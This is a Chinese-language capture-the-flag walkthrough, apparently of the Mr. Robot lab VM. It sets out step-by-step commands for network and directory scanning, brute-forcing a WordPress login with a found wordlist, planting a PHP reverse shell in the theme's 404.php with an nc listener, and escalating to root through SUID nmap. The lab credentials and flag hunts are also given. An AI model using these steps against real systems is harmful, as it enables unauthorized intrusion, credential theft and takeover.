一、靶场环境需要桥接网络
不建议使用校园网,因为使用校园网进行主机探索的时候会出现数不完的主机。
arp-scan -l
若是流量少只能用校园网,便在这里看靶机ip
二、端口扫描
我习惯用fscan了(需要自己安装),你们用nmap也一样的
fscan -h ip
nmap -sS ip
三、开始找线索
访问网页,所有流程走一下,并没有发现什么有用的东西。
进行目录扫描
我用的是dirsearch(需要自己安装),用dirb也能扫出来
dirsearch -u http://xxx.xxx.xxx
dirb http://xxx.xxx.xxx
访问robots.txt, 发现两个文件,其中根据key-1-of-3.txt文件名可以知道有三个flag,而这是第一个。
访问key-1-of-3.txt
访问fsocity.dic发现是一个字典(可以先留着)
访问wp-admin页面
弱口令无效,使用之前找到的字典,对用户名进行爆破。
字典有八十多万个,而用户名却在最后几个(有点ex人),用户名为elliot
接着对系统进行指纹扫描,不出意外是WordPress(因为有很多wp)
nikto -h +靶机ip
使用wpscan进行密码破解,还是用那个字典
还是要爆破很久,密码为ER28-0652
四、漏洞发现及利用
发现在Appearance下的Editor处存在代码编辑的功能,我们选择编辑404.php
将kali下的反弹shell代码复制出来替换404.php的内容(记得保存)
cd /usr/share/webshells/php
cat php-reverse-shell.php
记得ip和端口要改成kali的ip和监听的端口
kali使用nc监听,要对应404.php里的端口
nc lvp 8888
访问404.php
发现kali已经连接上了
使用命令优化终端
python -c 'import pty;pty.spawn("/bin/sh")'
进入home,发现robot用户
发现第发现robot的密码,使用MD5解密
进入robot用户,拿到第二个flag
su robot
abcdefghijklmnopqrstuvwxyz
五、提高权限
(查找有SUID权限的文件)
find / -perm -4000 2>/dev/null 
使用nmap进行提权
nmap --interactive
!sh
查找第三个flag
find / -name key-3-of-3.txt
结束!
